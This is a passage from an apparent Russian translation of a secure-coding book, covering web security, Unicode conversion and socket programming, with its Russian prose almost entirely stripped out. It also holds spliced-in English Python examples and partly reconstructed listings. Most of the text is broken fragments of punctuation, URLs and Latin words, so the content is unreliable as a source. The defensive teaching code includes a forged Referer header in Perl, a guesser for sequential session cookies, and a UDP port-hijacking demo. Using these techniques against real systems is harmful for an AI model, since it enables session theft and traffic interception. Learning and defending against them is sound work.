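        print(f"{s!r:36} regex={regex_allows(s)!s:5} parser={parser_allows(s)}")
```

Neither version tries to recognise bad things; both enumerate the good ones, which is why the long list of vectors earlier in the chapter does not have to be kept up to date for them.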
,
(http://www.distributed.net), 2002 .
. ,
, , , http://n0cgi.distribu
ted.net/faq/cache/268.html. , , URL
n<>cgi.
XSS-
,
XSS.
1. Web. ,
, querystring, HTTP, cookie
.
2. .
3. , .
4. , ?
, , ,
, (
), ,
. ,
, .
.
, , innerHTML docu
ment.write.
Web
HTML Form Protocol Attack (
HTML),
. , ,
http://www.remote.org/jochen/sec/hfpa/hfpa.pdf.
Web
, Web
. ,
Microsoft,
.
- eval()
, JavaScript
eval ( ),
. eval ,
JavaScript,
. ,
HTTP
HTTP HTTP,
. ,
. Web
REFERER, cookie
, .
REFERER
REFERER HTTP, Web
URL Web, . Web
(spoofing), REFERER .
, ASP:
<%
strRef = Request.ServerVariables("HTTP_REFERER")
If strRef = "http://www.northwindtraders.com/login.html" Then
' , Login.html!
' ! .
End If
%>
Perl , REFERER HTTP
, Login.html:
# LWP::UserAgent request with a forged Referer header.
$req->header(Referer => 'http://www.northwindtraders.com/login.html');
$res = $ua->request($req);
, Login.html, !
,
REFERER, .
. :
, , ,
.
, Web
: REFERER , ,
!
ISAPI
ISAPI
:
.
,
, ISAPI. ,
IIS 5 Inetinfo.exe,
SYSTEM. : DLL,
SYSTEM, ,
.
, ,
ISAPI C C++.
IIS 6 ,
SYSTEM, , ,
.
ISAPI
IPP (Internet Printing Protocol). http://www.mic
rosoft.com/technet/security/bulletin/MS01023.asp.
, ,
lpECB>GetServerVariable, HTTP
IIS. , lpdwSizeofBuffer
, , ,
, , ,
Unicode ANSI.
IPP.
// Convert the host name from ANSI to Unicode. The last argument is a
// count of WCHARs, not bytes.
MultiByteToWideChar(CP_ACP,
                    0,
                    (LPCSTR)szHostName,
                    -1,
                    g_wszHostName,
                    sizeof(g_wszHostName) / sizeof(g_wszHostName[0]));
IIS 6 : IPP ,
, ,
.
:
ISAPI;
ISAPI;
Unicode ANSI.
ISAPI;
;
, ,
.
.
cookie-
cookie , ,
, .
, ,
, .
, cookie
, .
cookie HTML ,
. 5% 50%,
Web !
cookie
, :
HTML,
Web.
Element N.V. Element InstantShop. http://
www.securityfocus.com/bid/1836.
: cookie,
, .
,
MAC cookie ,
.
, , Web.
, ,
. , ! MAC 6.
cookie-
.
Web .
cookie.
, HTTP ,
cookie. cookie
RFC 2965 HTTP State Management Mechanism (
HTTP) (http://www.ietf.org/rfc/rfc2965.txt).
Web
, ,
.
cookie,
,
. ,
cookie. , :
SSL. SSL , cookie
. 32 ,
. , SSL
cookie, Web. , 0005F1CC.
,
cookie 0005F1CE. 0005F1CF.
: cookie ,
,
. , cookie 0005F1CD.
, Cookie: 0005F1CD
,
. ! ,
,
,
.
: cookie
. cookie
. 8. SSL,
(, ).
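Added Python example (not the book's code) for the two cookie weaknesses discussed above: a value such as a price that the client can edit, protected with a keyed MAC as Chapter 6 recommends, and a sequential session id that lets an attacker guess a neighbour's cookie, contrasted with ids drawn from the OS CSPRNG. SERVER_KEY is a constructed secret; seal, unseal and predict_neighbor are names chosen for the example.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret; in practice loaded from protected storage.
SERVER_KEY = secrets.token_bytes(32)


def seal(value: str, key: bytes = SERVER_KEY) -> str:
    """Append a keyed MAC to a cookie value: 'price=10|<hex HMAC-SHA256>'.
    The client can still read the value; it can no longer change it."""
    mac = hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"


def unseal(cookie: str, key: bytes = SERVER_KEY):
    """Return the value if its MAC verifies, else None. Constant-time
    comparison so the check itself leaks nothing about the expected MAC."""
    value, sep, mac = cookie.rpartition("|")
    if not sep:
        return None
    expected = hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None


def new_session_id() -> str:
    """128 bits from the OS CSPRNG: knowing every id issued before and after
    tells an attacker nothing about this one."""
    return secrets.token_hex(16)


def predict_neighbor(observed: str) -> str:
    """The attack on sequential ids from the text: having received
    0005F1CC and 0005F1CE, guess that 0005F1CD belongs to the user in
    between and replay it."""
    return format(int(observed, 16) + 1, "08X")


if __name__ == "__main__":
    sealed = seal("price=10")
    tampered = sealed.replace("price=10", "price=1")
    print(sealed, unseal(sealed), unseal(tampered))
    print(predict_neighbor("0005F1CC"), new_session_id())
```

A MAC gives integrity, not secrecy: the sealed value is readable by whoever holds the cookie, so anything confidential still needs SSL/TLS on the wire and must not be stored in the cookie at all if the client should not see it.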
SSL/TLS
,
, ,
SSL. SSL, ,
, TLS, , .
:
;
;
.
,
. :
.
, SSL/TLS;
,
.
,
SSL/TLS,
.
, ,
, Subject ()
X.509, , .
WinInet, WinHTTP System.Net .NET
Framework . ,
.
XSS Web ,
.
,
. Web
.
Web, HTML HTML
XSS.
14
, ,
, . ,
,
( ) .
, Unicode .
. ,
Windows Security Push,
, ,
.
I18N.
internationalization ( i, n, 18
), .
, . , ,
10 11. , , ,
, , I18N
. .
I18N
I18N, :
Unicode;
Unicode
.
,
. , ,
, !
I18N .
Unicode
(A, , )
( ),
(code point). ,
Microsoft Windows .
, Unicode , ,
. Unicode
, .
Microsoft Windows Microsoft Office Unicode,
, , ,
Unicode. CLR .NET Framework
Unicode.
Unicode:
UTF8, UTF16 UTF32.
, UTF16,
Windows .NET.
, . UTF8
, Windows, .
Windows (National Langu
age Support, NLS) API
UTF8 UTF16, : MultiByteToWideChar
WideCharToMultiByte. UTF32 ,
.
- I18N
,
.
.
// First call: ask how many wide characters the result needs,
// including the terminating \0.
int nLen = MultiByteToWideChar(CP_OEMCP,
                               MB_ERR_INVALID_CHARS,
                               lpszOld, -1, NULL, 0);

// Zero means failure, for example an invalid character in the input.
if (nLen == 0) {
    // Handle the error; do not continue with the conversion.
}

// Allocate exactly that many wide characters.
LPWSTR lpszNew = (LPWSTR) GlobalAlloc(0, sizeof(WCHAR) * nLen);

// The allocation can fail too.
if (lpszNew == NULL) {
    // Handle the error.
}

// Second call: perform the conversion into the correctly sized buffer.
nLen = MultiByteToWideChar(CP_OEMCP,
                           MB_ERR_INVALID_CHARS,
                           lpszOld, -1, lpszNew, nLen);

// Zero again means failure; free lpszNew before bailing out.
if (nLen == 0) {
    // Handle the error.
}
. , GB18030,
4 ,
.
LCMapString :
, , LCMAP_SORTKEY.
, Unicode
, Creating Arbitrary Shellcode in Unicode
Expanded Strings (http://www.nextgenss.com/papers/unicodebo.pdf)
Unicode.
, Win32
. ( CreateProcessA),
, Unicode
, Win32 W ( CreateProcessW)
16 ,
.
.
A W
Windows. winbase.h
.
#ifdef UNICODE
#define CreateProcess CreateProcessW
#else
#define CreateProcess CreateProcessA
#endif // !UNICODE
Unicode
Unicode (surrogate pair)
,
Unicode. , ,
16 U+D800 U+DBFF.
, , U+DC00 U+DFFF.
Unicode (combining character)
.
, .
http://www.unicode.org.
, :
, , 16
UTF16
. 16 Unicode
, .
Unicode .
I18N
, Unicode
. , ,
, ,
, URL.
,
.
Microsoft, Windows .NET Server 2003 IsNLSDefinedString,
, Unicode.
IsNLSDefinedString True, :
, CompareString (,
).
.
Unicode
. , 3.log Unicode (3. log),
ASCII. ,
.
, .
(
).
LCMapString
LCMapString (
), .
LCMapString
. , LCMapString
, .
, LCMapString .
, IsNLSDefinedString,
.
CreateFile
CompareString (
) : .
, , CompareString ,
NTFS , .
. ,
, ,
CreateFile .
.
. ,
ISO 88598E ( )
UTF16,
950 (Big5, )
UTF16.
, .
, ,
, .
UTF8 Windows XP
MultiByteToWideChar WideCharToMultiByte.
UTF8 UTF16 ,
.
, .
Windows
.
Microsoft MultiByteToWideChar
WideCharToMultiByte
. ,
, .
MultiByteToWideChar
MB_PRECOMPOSED MB_ERR_INVALID_CHARS
MultiByteToWideChar MB_PRECOMPOSED.
( )
. .
50000, MB_ERR_INVALID_CHARS
.
50000 MultiByteToWideChar ,
, .
MB_ERR_INVALID_CHARS
.
MSDN.
Windows XP, MB_ERR_INVALID_CHARS
UTF8 ( 65001, CP_UTF8).
WideCharToMultiByte
WC_NO_BEST_FIT_CHARS
, (,
, ), WC_NO_BEST_
FIT_CHARS. ,
.
. , (
) 8 ()!
WC_NO_BEST_FIT_CHARS Microsoft Windows 2000/XP
Microsoft Windows .NET Server 2003.
,
, WideCharToMultibyte, UTF
16, MultiByteToWideChar
.
( ), ,
.
.
/*
  RoundTrip.cpp : checks that a Unicode string survives a round trip
  through a given code page.
*/
#include "stdafx.h"
#include <windows.h>
#include <strsafe.h>
#include <stdio.h>

/*
  CheckRoundTrip
  Returns TRUE if the string converts to the code page and back to
  Unicode without loss, FALSE otherwise.
*/
BOOL CheckRoundTrip(
    DWORD uiCodePage,
    LPWSTR wszString)
{
    BOOL fStatus = TRUE;
    BYTE *pbTemp = NULL;
    WCHAR *pwcTemp = NULL;

    try {
        // Strings longer than MAX_STRING_LEN are rejected outright.
        const size_t MAX_STRING_LEN = 200;
        size_t cchCount = 0;

        if (!SUCCEEDED(StringCchLength(wszString,
                                       MAX_STRING_LEN, &cchCount)))
            throw FALSE;

        pbTemp = new BYTE[MAX_STRING_LEN];
        pwcTemp = new WCHAR[MAX_STRING_LEN];

        if (!pbTemp || !pwcTemp) {
            printf("Error: out of memory!\n");
            throw FALSE;
        }

        ZeroMemory(pbTemp, MAX_STRING_LEN * sizeof(BYTE));
        ZeroMemory(pwcTemp, MAX_STRING_LEN * sizeof(WCHAR));

        // Unicode -> code page.
        int rc = WideCharToMultiByte(uiCodePage,
                                     0,
                                     wszString,
                                     -1,
                                     (LPSTR)pbTemp,
                                     MAX_STRING_LEN,
                                     NULL,
                                     NULL);
        if (!rc) {
            printf("Error: WC2MB = %d, CodePage = %d, String = %ws\n",
                   GetLastError(), uiCodePage, wszString);
            throw FALSE;
        }

        // Code page -> Unicode. The size argument counts WCHARs, so a
        // conservative count is passed rather than the byte size.
        rc = MultiByteToWideChar(uiCodePage,
                                 0,
                                 (LPSTR)pbTemp,
                                 -1,
                                 pwcTemp,
                                 MAX_STRING_LEN / sizeof(WCHAR));
        if (!rc) {
            printf("Error: MB2WC = %d, CodePage = %d, String = %ws\n",
                   GetLastError(), uiCodePage, wszString);
            throw FALSE;
        }

        // The result must have the original length (rc includes the
        // terminating null).
        size_t Length = 0;
        StringCchLength(wszString, MAX_STRING_LEN, &Length);
        if (Length + 1 != rc) {
            printf("Length %d != rc %d\n", Length, rc);
            throw FALSE;
        }

        // And every character must match the original.
        for (size_t ctr = 0; ctr < Length; ctr++) {
            if (pwcTemp[ctr] != wszString[ctr])
                throw FALSE;
        }
    } catch (BOOL iErr) {
        fStatus = iErr;
    }

    if (pbTemp) delete [] pbTemp;
    if (pwcTemp) delete [] pwcTemp;

    return (fStatus);
}

int _cdecl main(
    int argc,
    char* argv[])
{
    LPWSTR s1 = L"\x00a9MicrosoftCorp";   // Copyright sign
    LPWSTR s2 = L"To\x221e&Beyond";       // Infinity sign

    // The format strings of the original listing are lost; the calls
    // follow the order the accompanying text describes.
    printf("1252 s1: %d\n", CheckRoundTrip(1252, s1));
    printf("437  s1: %d\n", CheckRoundTrip(437, s1));
    printf("437  s2: %d\n", CheckRoundTrip(437, s2));
    printf("1252 s2: %d\n", CheckRoundTrip(1252, s2));

    return (1);
}
,
. ,
1252 ( Windows Latin I,
) 437 ( MS
DOS): 1252, 437,
437, 1252.
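The CheckRoundTrip test above in Python, as an added example (not from the book), using the standard codecs for code pages 1252 and 437 so it runs anywhere. It also covers the two failure modes this chapter warns about: silent "best fit" substitution (stood in for by errors='replace', since Python has no best-fit tables) and malformed input that MB_ERR_INVALID_CHARS would reject, including the overlong C0 BC form of '<' from the XSS vector list in Chapter 13. The strings S1 and S2 are the two from the C++ listing.

```python
def check_round_trip(code_page: str, text: str) -> bool:
    """Encode strictly into the code page and decode back; True only if the
    result equals the original character for character (same test as the
    C++ CheckRoundTrip above)."""
    try:
        back = text.encode(code_page, errors="strict").decode(code_page)
    except UnicodeError:
        return False
    return back == text


def best_fit_lossy(code_page: str, text: str) -> str:
    """What a best-fit conversion hides: characters outside the code page
    are quietly replaced. Python has no best-fit tables, so errors='replace'
    (which substitutes '?') stands in for WideCharToMultiByte without
    WC_NO_BEST_FIT_CHARS."""
    return text.encode(code_page, errors="replace").decode(code_page)


def decode_strict_utf8(data: bytes):
    """MB_ERR_INVALID_CHARS analogue for UTF-8: malformed sequences are
    rejected instead of guessed. The overlong form C0 BC, which lax
    decoders turn into '<', is refused."""
    try:
        return data.decode("utf-8", errors="strict")
    except UnicodeDecodeError:
        return None


# The two test strings from the C++ listing: a copyright sign and an
# infinity sign. 1252 has the first but not the second; 437 the reverse.
S1 = "\u00a9MicrosoftCorp"
S2 = "To\u221e&Beyond"

if __name__ == "__main__":
    for cp, s in (("cp1252", S1), ("cp437", S1), ("cp437", S2), ("cp1252", S2)):
        print(f"{cp} {s!r}: round trip {check_round_trip(cp, s)}, "
              f"best-fit would give {best_fit_lossy(cp, s)!r}")
    # Full-width digit three: the strict check refuses it, whereas a best-fit
    # conversion would silently turn it into an ASCII '3' (a different name).
    print(check_round_trip("cp1252", "\uff13.log"),
          best_fit_lossy("cp1252", "\uff13.log"))
    print(decode_strict_utf8(b"\xc0\xbcscript>"), decode_strict_utf8(b"<script>"))
```

The practical rule is the one the chapter gives: decide in Unicode, convert once, and treat any conversion that does not round-trip as an error rather than as data.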
, ,
,
. , .
, [
(. http://www.unicode.org/
unicode/reports/tr21)], Invariant, (LOCALE_INVARIANT) Win
dows XP invariant culture .
Unicode
Unicode ,
( )
. , ,
U+0030 (0) U+0039 (9).
Unicode 3.1 .
.
Unicode.
.NET Framework GetUnico
deCategory. , NLS
. Unicode
http://www.unicode.org/unicode/reports/tr23.
GetStringTypeEx,
. , GetStringTypeEx,
Unicode, .
Windows ,
GetStringTypeEx.
. 141 GetStringTypeEx Unicode
, U+0080. U+0080
Unicode.
Table 14-1. GetStringTypeEx character classes

    C1_ALPHA        Letters
    C1_UPPER        Uppercase letters
    C1_LOWER        Lowercase letters
    C1_DIGIT        Decimal digits
    C1_SPACE        Space characters
    C1_PUNCT        Punctuation
    C1_CNTRL        Control characters (ISO 6429 and format characters)
    C1_XDIGIT       Hexadecimal digits
    C3_NONSPACING   Nonspacing (combining) marks
    C3_SYMBOL       Symbols
    C3_KATAKANA     Katakana
    C3_HIRAGANA     Hiragana
    C3_HALFWIDTH    Half-width characters
    C3_IDEOGRAPH    Ideographic characters
, Unicode,
. ,
. . .
A. ,
.
, , .
, .
.
Unicode Consortium
. Form C.
.
. , ,
Form C. ( http://
www.unicode.org/unicode/reports/tr15/.)
URL IETF (Internet
Engineering Task Force) W3C. http:/
/www.idn.net/draft/draftduersti18nnorm04.txt http://www.w3.org/TR/
charmod.
NTFS, FAT32, NFS, High Sierra MacOS
.
.
RFC.
Win32 FoldString
. , Unicode,
Unicode. FoldString,
Unicode. , FoldString MAP_FOLDDIGITS
, Unicode.
I18N , ,
.
,
. ,
,
.
, , I18N .
I18N
, ,
12
Unicode. ,
, .
I18N,
Microsoft (http://www.microsoft.com/globaldev) Unicode (http://
www.unicode.org). (http://
www.unicode.org/unicode/consortium/distlist.html). , ,
news://comp.std.internat.
III
15
(sockets) ,
TCP/IP. IP
TCP UDP ,
. ,
IPv6 (Internet Protocol version 6)
.
, ;
,
; .
,
,
.
, .
, (Bob Quinn)
(David Shute) Windows Sockets Network Programming (AddisonWesley
Publishing Co., 1995). C
++. .cpp,
,
C.
Microsoft,
.
, Windows
, (
SSL/TLS) API SSPI (Secu
rity Support Provider Interface). API
, :
. 4, SSPI
(server hijacking)
, .
?
.
TCP UDP . ,
, , .
(unsigned short) ( 16)
C C++. 065535.
bind :
int bind (
SOCKET s,
const struct sockaddr FAR* name,
int namelen
);
.
IPv4* (Internet Protocol version 4)
sockaddr_in:
struct sockaddr_in {
    short          sin_family;
    unsigned short sin_port;
    struct in_addr sin_addr;
    char           sin_zero[8];
};
IPv6 .
, Microsoft
Service Pack 1 Microsoft Windows XP.
IPv6 IPv4. IPv4, ,
,
.
IP
sin_port sin_addr.
, sin_addr
. bind , ,
,
IP. . .
INADDR_ANY ( 0),
. IP,
, .
( ) : .
. INADDR_ANY
IP. IP:
157.34.32.56 172.101.92.44.
172.101.92.44,
INADDR_ANY.
IP, .
, ,
. , ,
.
SO_EXCLUSIVEADDRUSE, Microsoft Windows NT 4 SP 4.
, Microsoft ,
(Chris Wysopal) ( Weld Pond).
Netcat ( Hobbit) Windows
:
Windows NT .
, Hobbit
L0pht ( @stake). (.
Secureco2\Chapter15\BindDemo)
.
/*
  BindDemoSvr.cpp
*/
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <assert.h>
#include "SocketHelper.h"

// Older winsock2.h headers do not define this option.
#ifndef SO_EXCLUSIVEADDRUSE
#define SO_EXCLUSIVEADDRUSE ((int)(~SO_REUSEADDR))
#endif

/*
  A small UDP server. It binds to the address given on the command line,
  port 8391, prints what it receives and quits after ten packets. With
  -hijack it tries to bind on top of an existing server using
  SO_REUSEADDR; with -nohijack it protects its own port with
  SO_EXCLUSIVEADDRUSE so nobody can do that to it.
*/
int main(int argc, char* argv[])
{
    SOCKET sock;
    sockaddr_in sin;
    DWORD packets;
    bool hijack = false;
    bool nohijack = false;

    // The argument handling and socket creation of the original listing
    // are missing from this page; everything up to the first setsockopt
    // below is a reconstruction, and the -hijack/-nohijack spelling of
    // the switches is an assumption.
    if(argc < 2 || argc > 3)
    {
        printf("Usage: %s <address to bind to> [-hijack | -nohijack]\n",
               argv[0]);
        return -1;
    }
    if(argc == 3)
    {
        if(strcmp(argv[2], "-hijack") == 0)
            hijack = true;
        else if(strcmp(argv[2], "-nohijack") == 0)
            nohijack = true;
    }

    WSADATA wsaData;
    if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
    {
        printf("WSAStartup failed - err = %d\n", GetLastError());
        return -1;
    }

    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if(sock == INVALID_SOCKET)
    {
        printf("Cannot create socket - err = %d\n", GetLastError());
        return -1;
    }

    // InitSockAddr (SocketHelper.cpp) fills in the address and port.
    if(!InitSockAddr(&sin, argv[1], 8391))
    {
        printf("Cannot resolve %s\n", argv[1]);
        closesocket(sock);
        return -1;
    }
    // End of the reconstructed section.

    // Hijack: ask for an address that someone else already has.
    if(hijack)
    {
        BOOL val = TRUE;
        if(setsockopt(sock,
                      SOL_SOCKET,
                      SO_REUSEADDR,
                      (char*)&val,
                      sizeof(val)) == 0)
        {
            printf("SO_REUSEADDR set - attempting hijack!\n");
        }
        else
        {
            printf("Cannot set SO_REUSEADDR - err = %d\n",
                   GetLastError());
            closesocket(sock);
            return -1;
        }
    }
    else
    if(nohijack)
    {
        BOOL val = TRUE;
        if(setsockopt(sock,
                      SOL_SOCKET,
                      SO_EXCLUSIVEADDRUSE,
                      (char*)&val,
                      sizeof(val)) == 0)
        {
            printf("SO_EXCLUSIVEADDRUSE set\n");
            printf("This port cannot be hijacked!\n");
        }
        else
        {
            printf("Cannot set SO_EXCLUSIVEADDRUSE - err = %d\n",
                   GetLastError());
            closesocket(sock);
            return -1;
        }
    }

    if(bind(sock, (sockaddr*)&sin, sizeof(sockaddr_in)) == 0)
    {
        printf("Socket bound to %s\n", argv[1]);
    }
    else
    {
        if(hijack)
        {
            printf("Hijack failed!\n");
        }
        printf("Cannot bind socket - err = %d\n", GetLastError());
        closesocket(sock);
        return -1;
    }

    // Serve ten packets and exit. Note that a server whose port has
    // been hijacked simply never sees its traffic again.
    for(packets = 0; packets < 10; packets++)
    {
        char buf[512];
        sockaddr_in from;
        int fromlen = sizeof(sockaddr_in);

        // recvfrom returns: > 0 the number of bytes received;
        // 0 a closed connection (not applicable to UDP);
        // SOCKET_ERROR on failure.
        // Leave room for a terminator: recvfrom does not add one.
        int cb = recvfrom(sock, buf, sizeof(buf) - 1, 0,
                          (sockaddr*)&from, &fromlen);
        if(cb > 0)
        {
            buf[cb] = '\0';
            printf("Packet from %s port %d:\n%s\n",
                   inet_ntoa(from.sin_addr),
                   ntohs(from.sin_port),
                   buf);

            // If we stole the port, tell the legitimate server on
            // localhost that its traffic is being intercepted.
            if(hijack)
            {
                sockaddr_in local;
                if(InitSockAddr(&local, "127.0.0.1", 8391))
                {
                    buf[sizeof(buf) - 1] = '\0';
                    strncpy(buf, "Hijacked!", sizeof(buf) - 1);
                    if(sendto(sock,
                              buf,
                              strlen(buf) + 1, 0,
                              (sockaddr*)&local,
                              sizeof(sockaddr_in)) < 1)
                    {
                        printf("Cannot send to localhost - err = %d\n",
                               GetLastError());
                    }
                }
            }
        }
        else
        {
            // recvfrom failed; report the error and give up.
            printf("recvfrom failed - err = %d\n", GetLastError());
            break;
        }
    }

    closesocket(sock);
    WSACleanup();
    return 0;
}
,
. SocketHelper.cpp ,
. ,
.
.
: hijack nohijack.
, .
. hijack SO_REUSEADDR,
, nohijack
SO_EXCLUSIVEADDRUSE, SO_REUSEADDR.
, .
.
,
.
, , SO_EX
CLUSIVEADDRUSE. , ,
:
BindDemo.exe 0.0.0.0
( 192.168.0.1 IP
):
BindDemoClient.exe 192.168.0.1
:
SO_REUSEADDR ! !!
192.168.0.1
192.168.0.1 4081:
!
:
0.0.0.0
192.168.0.1 8391:
!
(,
, , IP ,
ACL), ,
.
,
. , , ,
.
. (
) :
SO_EXCLUSIVEADDRUSE ! !
0.0.0.0
:
SO_REUSEADDR ! !!
! !
= 10013
, ,
:
192.168.0.1 4097:
!
SO_EXCLUSIVEADDRUSE
,
. ,
TCP/IP
. ,
shutdown , recv
,
. closesocket,
. shutdown SDK.
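The binding rules just given, applied in an added Python example (not the book's code) that runs the hijack experiment against a loopback UDP socket. On Windows the defence is SO_EXCLUSIVEADDRUSE, exactly as the text says, because there SO_REUSEADDR on the attacker's socket alone is enough to take the port; on Linux and the BSDs the option does not exist and the defence is simply never setting SO_REUSEADDR on the server socket, since those kernels require both sides to opt in. The helper names are the example's own; port 0 lets the OS pick a free port so the demo does not collide with anything.

```python
import socket


def bind_exclusive(sock: socket.socket, host: str, port: int) -> None:
    """Bind a server socket so that nobody can bind on top of it:
      - never set SO_REUSEADDR on a server socket;
      - on Windows, set SO_EXCLUSIVEADDRUSE (the option does not exist
        elsewhere, so it is applied only when the platform offers it);
      - bind to a specific address, not INADDR_ANY, since a later bind to
        a concrete address would otherwise win the packets.
    """
    if host in ("", "0.0.0.0", "::"):
        raise ValueError("bind to a specific address, not INADDR_ANY")
    exclusive = getattr(socket, "SO_EXCLUSIVEADDRUSE", None)  # Windows only
    if exclusive is not None:
        sock.setsockopt(socket.SOL_SOCKET, exclusive, 1)
    sock.bind((host, port))


def hijack_attempt(host: str, port: int) -> bool:
    """What the -hijack switch of BindDemo does: a second socket sets
    SO_REUSEADDR and tries to take the same address and port.
    Returns True if the bind succeeded, i.e. the port was stolen."""
    thief = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        thief.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        thief.bind((host, port))
        return True
    except OSError:
        return False
    finally:
        thief.close()


def port_is_defended() -> bool:
    """Start a defended UDP server on loopback (port chosen by the OS),
    run the hijack attempt against it and report whether it failed."""
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        bind_exclusive(server, "127.0.0.1", 0)
        port = server.getsockname()[1]
        return not hijack_attempt("127.0.0.1", port)
    finally:
        server.close()


if __name__ == "__main__":
    print("port defended:", port_is_defended())
```

Remove the SO_EXCLUSIVEADDRUSE line on Windows and the same program reports the port as stolen, which is the -hijack run of BindDemo reproduced in a dozen lines.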
TCP
RFC, TCP,
, .
,
, TCP ACK
. ,
, .
(Douglas Comer) Internet
working with TCP/IP Vol. 1: Principles, Protocols, and Architectures (4th Edition) (Pren
tice Hall, 2000) ( . /I. . 1. , . .:
, 2003).
:
( ),
.
40 TCP IP.
,
.
TCP/IP
,
. ,
, , .
. ,
. ,
, .
,
. ,
Webc,
. ,
close shutdown.
,
, ,
. IP ,
: ,
. ,
, , (multihomed)
. .
. , IP
,
/.
, IP ,
;
. ,
,
. ,
. ,
IP :
;
IP(),
;
, .
IP
Windows NT. ,
, ,
.
API Windows Sockets 2.0 (Winsock)
, .
, (, UDP), :
IP ,
. ,
.
, , ,
.
(, TCP)
. , TCP
.
, SYN.
(, ),
SYNACK,
ACK. .
, FIN.
FINACK .
, FIN
FINACK ,
(maximum segment lifetime, MSL).
MSL ,
, .
,
accept ( Accept
Connection.cpp, Secureco2\Chapter15\AcceptConnection):
{
printf(" !\n");
}
closesocket(sock2);
}
}
else
{
// listen() failed.
printf("listen failed - err = %d\n", GetLastError());
break;
}
// ,
// .
if(conns > 10)
{
break;
}
}
}
,
. ? ,
, ,
. , ,
. ,
. ,
, IP
, FINACK FIN .
MLS.
,
,
. setsockport
SO_LINGER
closesocket. .
WSAAccept.
SO_CONDITIONAL_ACCEPT
,
.
#include <winsock2.h>
#include <stdio.h>

// Address of this host; defined elsewhere in the sample and used here
// only to decide whom to reject.
extern const char *MyIpAddr;

// Condition function for WSAAccept. Only the last parameter survived on
// this page; the rest is the documented LPCONDITIONPROC signature.
int CALLBACK AcceptCondition(
    IN LPWSABUF lpCallerId,
    IN LPWSABUF lpCallerData,
    IN OUT LPQOS lpSQOS,
    IN OUT LPQOS lpGQOS,
    IN LPWSABUF lpCalleeId,
    OUT LPWSABUF lpCalleeData,
    OUT GROUP FAR *g,
    IN DWORD dwCallbackData
    )
{
    sockaddr_in* pCaller;
    sockaddr_in* pCallee;

    pCaller = (sockaddr_in*)lpCallerId->buf;
    pCallee = (sockaddr_in*)lpCalleeId->buf;

    printf("Connection attempt from %s\n",
           inet_ntoa(pCaller->sin_addr));

    // QOS is not supported on Windows 98; see Knowledge Base article Q193919.
    if(lpSQOS != NULL)
    {
        // Examine the requested QOS here if the server cares about it.
    }

    // Note: CF_DEFER is the third possible answer; it tells Winsock to
    // ask again later. Whatever the policy, do not resolve the caller's
    // address through DNS in here: the lookup blocks the accept path and
    // the reverse record is controlled by the other side anyway.

    // Demo policy: refuse connections that come from our own address.
    if(pCaller->sin_addr.S_un.S_addr == inet_addr(MyIpAddr))
    {
        return CF_REJECT;
    }
    else
    {
        return CF_ACCEPT;
    }
}

void NewStyleListen(SOCKET sock)
{
    // Count connections so the demo stops after a few.
    int conns = 0;

    // Ask Winsock to consult our condition function before accepting.
    BOOL val = TRUE;
    if(setsockopt(sock,
                  SOL_SOCKET,
                  SO_CONDITIONAL_ACCEPT,
                  (const char*)&val, sizeof(val)) != 0)
    {
        printf("Cannot set SO_CONDITIONAL_ACCEPT - err = %d\n",
               GetLastError());
        return;
    }

    while(1)
    {
        // Put the socket into the listening state.
        if(listen(sock, SOMAXCONN) == 0)
        {
            SOCKET sock2;
            sockaddr_in from;
            int size;

            // Unlike accept, WSAAccept lets us decide per connection.
            conns++;
            size = sizeof(sockaddr_in);

            sock2 = WSAAccept(sock,
                              (sockaddr*)&from,
                              &size,
                              AcceptCondition,
                              conns);   // handed to the callback as dwCallbackData

            if(sock2 == INVALID_SOCKET)
            {
                printf("WSAAccept failed - err = %d\n",
                       GetLastError());
            }
            else
            {
                // A connection the condition function chose to accept.
                printf("Accepted connection from %s\n",
                       inet_ntoa(from.sin_addr));

                // Demo only: close it straight away.
                closesocket(sock2);
            }
        }
        else
        {
            // listen() failed.
            printf("listen failed - err = %d\n", GetLastError());
            break;
        }

        // Stop after a handful of connections so the demo terminates.
        if(conns > 10)
        {
            break;
        }
    }
}
, ; ,
,
.
:
[d:\]AcceptConnection.exe
!
!
192.168.0.1
10061
192.168.0.1
10061
192.168.0.1
10061
TCP
, , .
SYN . ,
SYN, .
, ,
.
, .
:
.
.
,
.
WSAAccept ,
SYN (SYN
flood).
( AcceptEx)
/.
,
,
. :
! . ,
(
).
, .
, ,
.
, .
,
. , .
, .
, ,
.
, ,
:
;
;
, ;
;
, IP ;
.
.
.
, ,
. ,
,
TCP.
, :
. ,
, .
, IP , .
.
FTP. 21 TCP,
TCP
20 ( 1024).
, ,
20
, .
, , Microsoft SQL Server,
1433, Microsoft Terminal Server ( 3389), X Window (
XWindow
) ( 6000).
,
,
.
. ,
. , ,
,
. , ,
.
(, TCP) , ,
( , UDP).
,
, .
, DNS,
:
,
.
, (
, ),
. ,
,
.
,
(content level
filters). ,
.
,
. , .
, Web
80 .
IP-
IPv6 ,
(network address translation, NAT)
, ,
.
IP, ,
, NAT . :
IP . ,
IPv6.
,
, .
.
,
. , ,
(
); , ,
, .
: ,
. ,
, .
;
,
.
, , syslog.
UNIX UNIX
Windows. UDP,
, syslog
.
,
.
. , (Kevin
Mitnick) rsh IP
(Tsutomu Shimomura). ,
TCP
, ,
, .
DNS. , DNS
, , , somehost.nicwguys.org,
, destruc
tion.evilhackers.org.
! , ,
,
.
IP DNS
.
.
rsh: , UNIX
( root) 1024.
:
, , ,
, . ,
. ,
, ,
, .
,
.
,
. ,
, ( ) ,
. ! ,
,
.
IPv6 !
IPv6 IP,
IP IPv4. IPv6 128
, IP
,
. IPv6 ,
, . IPv6
.
, ,
IP .
IPv6 , ,
IPv4, (Christian
Huitema) IPv6: The New Internet Protocol, Second Edition (IPv6:
) (Prentice Hall PTR, 1998).
Internet Activities Board IETF, Microsoft.
IPv6 Microsoft Windows .NET Server 2003
Service Pack 1 Windows XP.
IPv6.
IPv6 IPa. IPv6
IP, , .
, IPv6 IP.
IPv6 :
(link local), (site local) (global).
, ,
IP. IP, ,
,
. :
; .
IPv6 IPSec (Internet Protocol
Security). IPv6 .
IPv6, ,
(, ),
,
IPSec. ,
IPv6
, . , ,
Microsoft
